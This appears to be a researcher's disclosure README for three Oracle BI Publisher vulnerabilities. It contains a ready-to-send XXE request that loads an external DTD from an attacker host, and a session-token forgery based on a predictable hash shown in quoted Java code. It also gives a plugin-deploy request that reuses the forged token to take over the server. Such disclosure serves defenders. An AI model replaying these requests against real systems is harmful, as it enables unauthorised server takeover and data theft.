├── README.md
└── img
    ├── f1.png
    ├── f2.png
    ├── f3.png
    ├── f4.png
    ├── hash.png
    ├── sess1.jpg
    └── sess2.jpg


/README.md:
--------------------------------------------------------------------------------
  1 | # Oracle-BI-bugs
  2 | 
  3 | ## CVE-2019-2767
  4 |  * Subject: XXE IN CONVERT SERVLET
  5 |  * CVSSv3.0 Base Score: 7.2
  6 |  * CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
  7 |  
  8 | ```
  9 | GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//ehost%3a1337/ev.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
 10 | Host: host
 11 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
 12 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 13 | Accept-Language: en-US,en;q=0.5
 14 | Accept-Encoding: gzip, deflat
 15 | Connection: close
 16 | Upgrade-Insecure-Requests: 1
 17 | ```
 18 | 
 19 | ## CVE-2019-2768
 20 |  * Subject: ACCESS TO ADMIN SERVICES, SESSION GENERATION ERROR
 21 |  * CVSSv3.0 Base Score: 7.5
 22 |  * CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 23 |  
 24 | Oracle BI has xmlpserver which the administrator is using for configuring the server. To use the xmlpserver services, the administrator have to create a session using createSession function.
 25 | ```
 26 | POST /xmlpserver/services/XMLPService HTTP/1.1
 27 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
 28 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 29 | Accept-Language: en-US,en;q=0.5
 30 | Accept-Encoding: gzip, deflate
 31 | Referer: http://192.168.204.179:9502/xmlpserver/services
 32 | Connection: close
 33 | Upgrade-Insecure-Requests: 1
 34 | SOAPAction: 
 35 | Content-Type: text/xml;charset=UTF-8
 36 | Host: 192.168.204.179:9502
 37 | Content-Length: 610
 38 | 
 39 | <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rep="http://xmlns.oracle.com/oxp/service/report">
 40 |    <soapenv:Header/>
 41 |    <soapenv:Body>
 42 |       <rep:createSession soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 43 |          <username xsi:type="xsd:string">weblogic</username>
 44 |          <password xsi:type="xsd:string">asdQWE123</password>
 45 |          <domain xsi:type="xsd:string">bi</domain>
 46 |       </rep:createSession>
 47 |    </soapenv:Body>
 48 | </soapenv:Envelope>
 49 | 
 50 | ```
 51 | I've tried to generate a session several times and I've got the same value in the response. I changed the password and but again I got the same response.
 52 | 
 53 | ```
 54 | <createSessionReturn xsi:type="xsd:string">-1626402211</createSessionReturn>
 55 | ```
 56 | 
 57 | ```java
 58 | private String createCallerSession(final XDOPrincipal user, final String domain) {
 59 |         Logger.log("XMLPService.createCallerSession...if here things are looking ok", 1);
 60 |         final String token = tokenize(domain, user.getName());
 61 |         final XDOPrincipal principal = TokenHolder.getPrincipal(token);
 62 |         if (principal == null) {
 63 |             final XDOPrincipal guser = (XDOPrincipal)GlobalUser.get();
 64 |             TokenHolder.addPrincipal(token, guser);
 65 |         }
 66 |         return token;
 67 |     }
 68 |     
 69 |     private static String tokenize(final String domain, final String username) {
 70 |         final StringBuffer sb = new StringBuffer();
 71 |         if (domain != null) {
 72 |             sb.append(domain);
 73 |         }
 74 |         sb.append(':').append(username);
 75 |         final int key = sb.toString().hashCode();
 76 |         return new Integer(key).toString();
 77 |     }
 78 | ```
 79 | WHAT? It seems that the session consists of two public datas (username and server ID). In order to check it I wrote a simple code and here  is what I got as a result.
 80 | 
 81 | ![web](https://github.com/vah13/Oracle-BI-bugs/blob/master/img/hash.png)
 82 | 
 83 | 
 84 | Example of plugin deploy request
 85 | ```
 86 | POST /xmlpserver/services/v2/PluginService HTTP/1.1
 87 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
 88 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 89 | Accept-Language: en-US,en;q=0.5
 90 | Accept-Encoding: gzip, deflate
 91 | Referer: http://192.168.204.179:9502/xmlpserver/services
 92 | Upgrade-Insecure-Requests: 1
 93 | SOAPAction: 
 94 | Content-Type: text/xml;charset=UTF-8
 95 | Host: 192.168.204.179:9502
 96 | Content-Length: 431
 97 | 
 98 | <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:v2="http://xmlns.oracle.com/oxp/service/v2">
 99 |    <soapenv:Header/>
100 |    <soapenv:Body>
101 |       <v2:deploy>
102 |          <v2:sessionToken>-1626402211</v2:sessionToken>
103 |          <v2:appPath>0</v2:appPath>
104 |          <v2:pluginName>1</v2:pluginName>
105 |          <v2:uploadedData>2</v2:uploadedData>
106 |       </v2:deploy>
107 |    </soapenv:Body>
108 | </soapenv:Envelope>
109 | ```
110 | So, as you can see , if someone knows 2 public data of the server he can take it under control.
111 | 
112 | 
113 | ## CVE-2019-2771
114 |  * Subject: BIP BYPASS FONT UPLOAD
115 |  * CVSSv3.0 Base Score: 8.2
116 |  * CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:L
117 |  
118 | ![web](https://github.com/vah13/Oracle-BI-bugs/blob/master/img/f1.png)
119 | 
120 | ![upload](https://github.com/vah13/Oracle-BI-bugs/blob/master/img/f2.png)
121 | 
122 | ![write file](https://github.com/vah13/Oracle-BI-bugs/blob/master/img/f3.png)
123 | 
124 | ![file on the system](https://github.com/vah13/Oracle-BI-bugs/blob/master/img/f4.png)
125 | 
126 | 
127 | 
128 | ---
129 |  * https://twitter.com/vah_13
130 |  * https://twitter.com/NewFranny
131 | 


--------------------------------------------------------------------------------
/img/f1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vah13/Oracle-BI-bugs/71258091d1de9f7c788acaf3e9e05fdea00bdd61/img/f1.png


--------------------------------------------------------------------------------
/img/f2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vah13/Oracle-BI-bugs/71258091d1de9f7c788acaf3e9e05fdea00bdd61/img/f2.png


--------------------------------------------------------------------------------
/img/f3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vah13/Oracle-BI-bugs/71258091d1de9f7c788acaf3e9e05fdea00bdd61/img/f3.png


--------------------------------------------------------------------------------
/img/f4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vah13/Oracle-BI-bugs/71258091d1de9f7c788acaf3e9e05fdea00bdd61/img/f4.png


--------------------------------------------------------------------------------
/img/hash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vah13/Oracle-BI-bugs/71258091d1de9f7c788acaf3e9e05fdea00bdd61/img/hash.png


--------------------------------------------------------------------------------
/img/sess1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vah13/Oracle-BI-bugs/71258091d1de9f7c788acaf3e9e05fdea00bdd61/img/sess1.jpg


--------------------------------------------------------------------------------
/img/sess2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vah13/Oracle-BI-bugs/71258091d1de9f7c788acaf3e9e05fdea00bdd61/img/sess2.jpg


--------------------------------------------------------------------------------